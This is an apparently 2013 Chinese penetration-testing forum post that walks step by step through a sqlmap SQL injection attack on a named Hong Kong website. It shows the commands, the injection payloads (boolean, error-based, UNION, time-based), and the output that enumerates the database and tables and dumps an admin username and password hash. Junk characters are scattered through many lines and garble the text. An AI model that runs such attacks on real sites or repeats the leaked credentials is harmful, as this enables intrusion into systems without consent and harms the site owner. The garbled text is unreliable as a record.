中国网络渗透测试联盟

标题: sqlmap实例注入mysql [打印本页]
作者: admin    时间: 2013-4-4 22:18
标题: sqlmap实例注入mysql
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
5 [: D) B5 b; l0 t2 B, [ms "Mysql" --current-user       /*  注解:获取当前用户名称; i" ?& x9 v/ ]
    sqlmap/0.9 - automatic SQL injection and database takeover tool& c7 {: i& E4 t* H
    http://sqlmap.sourceforge.net
  • starting at: 16:53:54' d# g* T7 H( }4 n
    [16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as5 C9 C' {: @3 g. s* t$ Y" J
    session file* ?. b! H) I+ X
    [16:53:54] [INFO] resuming injection data from session file1 A. s0 Y! A: G' b
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    : w9 \$ u2 ?1 Q, y[16:53:54] [INFO] testing connection to the target url
    9 g/ k( c$ D: a5 m7 Isqlmap identified the following injection points with a total of 0 HTTP(s) reque
    : N* Q( M1 P/ _% u9 v5 t' r0 [: y- vsts:
    " S3 O) ?- v! ^  f) V. r---
    6 M5 O. I! _: {7 zPlace: GET
    6 t% k* ?; B* ^6 S6 y2 E4 UParameter: id, W9 K. N( i( y( c# K0 X
        Type: boolean-based blind( r# i' q2 x- a. l! X* o* P
        Title: AND boolean-based blind - WHERE or HAVING clause# T2 K6 C  ~7 c' i
        Payload: id=276 AND 799=799
    / E1 Z" o* ?  m% s; M5 A    Type: error-based: j! u/ [* d8 M/ [, o/ R& Y
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    / T9 _6 F3 }1 u9 t) R    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    " C! G- G+ T" [/ Q% P120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58, \" j7 H, j7 `, L' x& c2 y5 o& M/ P
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a), ]; I$ c9 S7 p3 D( n
        Type: UNION query2 w, r4 \, p+ e5 ]  j" Y
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    ; y$ D* ~1 v; B    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    % t5 Z  s! @. p4 f* Y+ y, P(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),1 A0 u0 h0 X* A' h% r# h
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#; N: A) D6 D5 |: P
        Type: AND/OR time-based blind
    $ t5 S7 B5 e4 ?# z9 H4 v' L    Title: MySQL > 5.0.11 AND time-based blind
    1 d1 r( h6 `6 I/ p    Payload: id=276 AND SLEEP(5)
    ; m  Q2 o! o: K3 h2 K---4 h4 R5 k" t$ ]: x7 e. Z- a: |
    [16:53:55] [INFO] the back-end DBMS is MySQL( N9 u- X  Y2 F+ ]
    web server operating system: Windows3 C, P, E0 b/ E: S8 [  i
    web application technology: Apache 2.2.11, PHP 5.3.0
    : h! x9 e7 n6 I5 c( Uback-end DBMS: MySQL 5.0
    2 p8 c% l* K$ e5 A7 y[16:53:55] [INFO] fetching current user
    7 q6 W2 ], O' d; v9 dcurrent user:    'root@localhost'   
    , g! _9 z/ X/ B: z# T( |[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    5 \; B" x) A. P9 ]% ^tput\www.wepost.com.hk'
  • shutting down at: 16:53:58
    + Y1 \% |( `( V3 ~8 }) }0 ?: s+ l8 k! W$ ?7 E! p6 l) N
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db4 r1 ^) @& W% M% a: P; c
    ms "Mysql" --current-db                  /*当前数据库; t9 A4 r- y3 H+ K
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    ' j3 x# D6 R% \    http://sqlmap.sourceforge.net
  • starting at: 16:54:16
    0 V9 n- ^# Q$ h/ g2 T& O0 J& f[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    . I3 f2 l7 j" T5 C session file" @: `: ?& P$ y3 ~2 b8 D: Q; J
    [16:54:16] [INFO] resuming injection data from session file; c' d! y2 b2 h
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file9 x9 t! B  e# H. _* j1 _0 V4 j0 V
    [16:54:16] [INFO] testing connection to the target url
    + Z; C8 h: l  O+ asqlmap identified the following injection points with a total of 0 HTTP(s) reque5 x: ~3 W. [5 j' w  G! v
    sts:; Z4 b0 m" u. W- P/ W
    ---
    4 Q3 @5 x) [: n# |Place: GET5 _7 q7 P' _+ x# r8 i6 r
    Parameter: id
    : j( i) m! j$ _    Type: boolean-based blind' l* j0 b& y/ T% M& C" n
        Title: AND boolean-based blind - WHERE or HAVING clause" @1 @- M' N2 [% ^; g0 I
        Payload: id=276 AND 799=799
    4 H. N/ A/ }6 h% X0 I$ l/ Q! }    Type: error-based" B, D8 P5 g9 J
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    , d7 [' T# S1 W- f# `0 j    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,/ }+ I: }' m8 V% z3 @
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    & _3 `6 A- E, A4 l! g) k4 ]),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    4 k7 w: q8 Y8 X8 r/ z6 o    Type: UNION query1 Y: a* X5 G( b1 R
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    1 a0 T% _  M/ r, @    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR2 f* o+ }! b8 q; Y7 P
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    " Q7 s+ N& f3 t) g, l/ r4 N4 XCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#( T8 N2 R0 L1 a% i( ^
        Type: AND/OR time-based blind' ^' z) h8 G' o
        Title: MySQL > 5.0.11 AND time-based blind
    * x+ \1 H2 B: h    Payload: id=276 AND SLEEP(5)
    8 d* s! ~8 F4 ^/ Y# ~---
    6 F0 V6 ~1 E' J) E4 \3 A- b[16:54:17] [INFO] the back-end DBMS is MySQL% w" S4 G# B( I2 T3 R
    web server operating system: Windows6 }4 N0 @2 S7 K; F7 N
    web application technology: Apache 2.2.11, PHP 5.3.0- B0 T- H1 A3 N$ R0 m: ?$ W
    back-end DBMS: MySQL 5.0
    ) B5 ]' X: t; u6 T$ _9 q* {+ E[16:54:17] [INFO] fetching current database1 \: M7 [# ?5 D
    current database:    'wepost'' n+ p) \+ i2 |& p
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    . ?7 N: x3 q8 s" l8 q0 Gtput\www.wepost.com.hk'
  • shutting down at: 16:54:185 N  F2 C6 i8 _4 a
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    8 n7 N3 B: c6 X* A2 c8 i" A7 Zms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名5 A( h" ?( f; I* C2 q: k
        sqlmap/0.9 - automatic SQL injection and database takeover tool$ ?- S5 n0 b5 a* r$ w! t3 T- Y
        http://sqlmap.sourceforge.net
  • starting at: 16:55:25" l9 ~# G  W" [2 V
    [16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    : }8 |% f. l5 g5 N+ r. O session file8 d% I. H8 ^4 x- U$ e, h. a  e, @
    [16:55:25] [INFO] resuming injection data from session file
    ) Y- _; ^( f2 A) `" q' }, t, p[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    , b# Y- }* C# m[16:55:25] [INFO] testing connection to the target url8 r0 C4 Y5 {1 R7 u1 D
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    / F: ?5 |# x1 ^5 ?* ests:6 ]9 l( s8 @8 \. p+ ]
    ---0 J% ~8 e  V- m5 M5 a: T  j4 h
    Place: GET
    ' M& h- W# h  [* v% [0 MParameter: id
    ! z' M' q3 q4 j/ C( ^    Type: boolean-based blind
    - K- v; f/ _- E* ^; z3 w    Title: AND boolean-based blind - WHERE or HAVING clause
    2 n* j  b9 |& i) i+ O6 B    Payload: id=276 AND 799=799' ]( Y( _5 `0 n+ p0 V3 e4 i# ?  g/ [$ O
        Type: error-based
    2 Q9 [: G# X; @1 [    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    3 Y8 I4 F2 L- x( i0 L, k0 n1 z    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    3 z* ^5 n. T5 g6 `' X  ]120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,580 K# _0 T& _, g. `0 D
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    7 n, u3 h! i( H# J/ T    Type: UNION query4 Q3 \0 H, o: q6 a0 G
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    " y) i" s, O- \; l  z+ \3 Y" u    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR$ d( U1 C1 @3 q1 w3 R# Z" r
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    & g/ `' M! U) T2 {0 @+ U: C7 hCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    + {# _& i- y& w9 f; ~1 {    Type: AND/OR time-based blind
    : }' `/ T3 J: \" J2 m( G1 P& X    Title: MySQL > 5.0.11 AND time-based blind: T+ O) ]4 Q2 p8 e. W9 G, p
        Payload: id=276 AND SLEEP(5)* N/ }, d' Y4 n  B* n
    ---
    * @! r+ s- i- s! `* p3 G; M[16:55:26] [INFO] the back-end DBMS is MySQL
    & r% @7 u6 @! [7 \web server operating system: Windows
    1 e: X: A  L( d( j3 ]4 kweb application technology: Apache 2.2.11, PHP 5.3.0
    $ |$ E' S1 [& E* s- s9 X, n; x' Kback-end DBMS: MySQL 5.0
    7 q9 ^. K; O& u4 F* t3 L[16:55:26] [INFO] fetching tables for database 'wepost'; U. C* A3 R6 z+ ]; m5 ?
    [16:55:27] [INFO] the SQL query used returns 6 entries4 `" ^# W+ H- \
    Database: wepost  j  w9 ^8 r1 Y; r2 y
    [6 tables]
    ! [7 a) G0 s+ V" D: d9 [" z8 B5 J+-------------+/ @/ y5 K: }: e, \+ z7 E7 I6 e& M
    | admin       |* L8 S) S' M. V
    | article     |
    + A" ~. L/ `, w, t| contributor |
    / d3 x; D+ ]! F- {0 y| idea        |
    , J9 e& i3 ]# N( c# o# o+ U| image       |) [2 A& X: }/ V4 D' i0 X; y/ T9 E
    | issue       |: P+ J, f3 c: i1 O2 m/ s& O
    +-------------+. i7 d& n6 a8 L: U, f6 |
    [16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou9 H& C0 `3 \  P+ h4 e
    tput\www.wepost.com.hk'
  • shutting down at: 16:55:33/ t* k4 @2 D7 L2 ^9 X* w1 D

    7 k! N* e! u6 @, X' eD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db$ |$ Y$ O; [4 K# T$ d2 B  F+ o8 Q, [
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名6 ]6 L! O- \+ S& p6 h
        sqlmap/0.9 - automatic SQL injection and database takeover tool: p# j% y/ h) H, B8 m2 E- g- A
        http://sqlmap.sourceforge.net
  • starting at: 16:56:06
    9 ?# w" x" a& ysqlmap identified the following injection points with a total of 0 HTTP(s) reque" ?, ]4 o9 z% M" b# q5 v9 Q
    sts:2 Y5 [6 M9 H( o- T4 {
    ---
    1 c) N3 ~" f" J6 x) A: ?% w! ]Place: GET
      N- r$ s$ b  t8 M9 X: b1 d0 QParameter: id
    ! Y$ U2 S& U1 l/ h! c3 m& D: H% [    Type: boolean-based blind
    . W& B% S/ M5 ?9 I# M2 g& U  i    Title: AND boolean-based blind - WHERE or HAVING clause' x" X3 {$ f7 S7 B2 U# X, K
        Payload: id=276 AND 799=799
    # x, r! K" ^5 _6 j9 e    Type: error-based2 V* l3 e. z* R( g( w
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause; A0 D2 n5 m7 d7 B5 F" f0 V
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    1 b7 {; m8 k$ U3 O9 k  v- M120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58* [5 J4 i# D9 |# @0 J  e
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    6 M0 E2 n7 D8 w& O1 m1 ^9 x9 k# P    Type: UNION query
    ; O% c$ H+ x5 G% d+ r8 R2 G1 K    Title: MySQL UNION query (NULL) - 1 to 10 columns" A% \2 J! {% I  h9 @/ H
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    # n0 j2 @. P6 w5 L; k% k3 p(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),/ h5 q3 U) I4 d7 G/ x
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL## x( p9 z2 ~9 g7 F
        Type: AND/OR time-based blind
    $ O6 B& d. I' j! ?    Title: MySQL > 5.0.11 AND time-based blind; c5 W7 Q. q$ g6 g" `# ^  w% B& }
        Payload: id=276 AND SLEEP(5)
    + ?; U* ~/ e! T3 {) r; @( f---
    1 ~+ B% G3 N/ p, U( @- a9 H0 ^- O  ~web server operating system: Windows; ~* {3 n9 b% S
    web application technology: Apache 2.2.11, PHP 5.3.0' I- Z0 i' Y3 ]1 k
    back-end DBMS: MySQL 5.0& o5 C, s$ g* a: [, e
    [16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    ) z& x! y0 k: L. zssion': wepost, wepost
    ' F7 \/ y0 |2 [: t0 ADatabase: wepost
    0 W& |0 I' d0 j) |Table: admin% d' N6 p  n  S4 O7 Y
    [4 columns]
    - K% p) B/ c1 H4 a& T+----------+-------------+7 \* [2 _3 B9 A& d6 C* m& `
    | Column   | Type        |2 _! @) _! ?8 Q
    +----------+-------------+
    3 K+ S& t# }7 }; T0 l" V9 ~| id       | int(11)     |, @# ~, Q* [) u& h4 E8 v
    | password | varchar(32) |0 {4 ~8 s' f9 j
    | type     | varchar(10) |  C) K7 N) t" U5 B2 j- _
    | userid   | varchar(20) |$ W; B; U# m7 Y" Q0 `  c
    +----------+-------------++ j+ W( a; w+ N; ?7 `
  • shutting down at: 16:56:19
    - S8 D7 T5 E+ u! `, Q3 G
    ( q0 M6 i9 X1 v5 G6 n$ g' RD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db! J* [, ^  f. m* a) x
    ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容0 z% p! J5 @. u  ]
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    * E: A6 Z: A9 c! X    http://sqlmap.sourceforge.net
  • starting at: 16:57:14
    3 U7 q0 O, V% dsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    0 S2 X. ?7 n- _8 {9 n4 a6 V) usts:
    * B+ n0 j% N- ?: B---6 n- T' ~( `# P# X! u3 e; X
    Place: GET( Q) Y7 j" {2 g2 k. d
    Parameter: id
    . d( s& Q: W) i& P    Type: boolean-based blind
    9 N% A$ I5 C& `) ?$ d0 n7 N3 U    Title: AND boolean-based blind - WHERE or HAVING clause
    ; z; x6 s2 K; K0 o7 F  |    Payload: id=276 AND 799=799
    3 s& M7 I3 ^6 l& y! C    Type: error-based
    ' k5 |; c3 T/ V    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    : W. g% Z4 }' q8 x    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    9 ~; v+ q  i2 b# H' p6 P120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    " S, j( U. V6 V),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    , d! L- _* `; c: Z    Type: UNION query
    / `: ?% T# G6 S! h! W: @$ B    Title: MySQL UNION query (NULL) - 1 to 10 columns
    % l: Y, ]% q7 C9 v0 f8 u    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    # Z( z+ q5 r5 G6 u. m- R( @(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),* r9 A' O7 ?" s* z
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    2 c3 D  U1 G) T4 E- g; m) d$ t    Type: AND/OR time-based blind- c; x& ?! V/ B' b' ?  u
        Title: MySQL > 5.0.11 AND time-based blind' I4 C. h  E% Z8 p$ D9 n  R
        Payload: id=276 AND SLEEP(5)
    & p3 _) S+ A' |1 ?---
    6 q1 ~' _( j% c; D: w- E/ y: xweb server operating system: Windows( ^4 t; n. T" D9 ^
    web application technology: Apache 2.2.11, PHP 5.3.0
    $ ^6 x) a3 l) I9 I$ B- P1 @+ sback-end DBMS: MySQL 5.0
    * v, J7 u7 W; r3 x# T: k7 r& frecognized possible password hash values. do you want to use dictionary attack o
    " U0 ?; g& {, t, }: U3 in retrieved table items? [Y/n/q] y
    7 J' V' N$ o% ~  m7 {. @what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]1 B3 k4 ?) y# b2 Y6 B' I6 C
    do you want to use common password suffixes? (slow!) [y/N] y. J* V: y; G# X  j0 k
    Database: wepost
    ; n% L, y  z: a$ OTable: admin
    1 f, v, j2 N$ p& c; `[1 entry]" k% e. v- g* l1 T$ n" j3 T
    +----------------------------------+------------+
    0 P% b( c* N" n0 j' M. L2 h| password                         | userid     |) p; u5 @, |' G
    +----------------------------------+------------+
    - X% D0 P- ~/ q; J| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |7 T) F# W; Z' F9 p* n
    +----------------------------------+------------+1 J1 M  F$ C" `
  • shutting down at: 16:58:14* O) h+ ^* Y6 i0 a( G7 ~5 e

    4 e5 m3 f+ F6 ~( w$ v1 o- kD:\Python27\sqlmap>



    欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2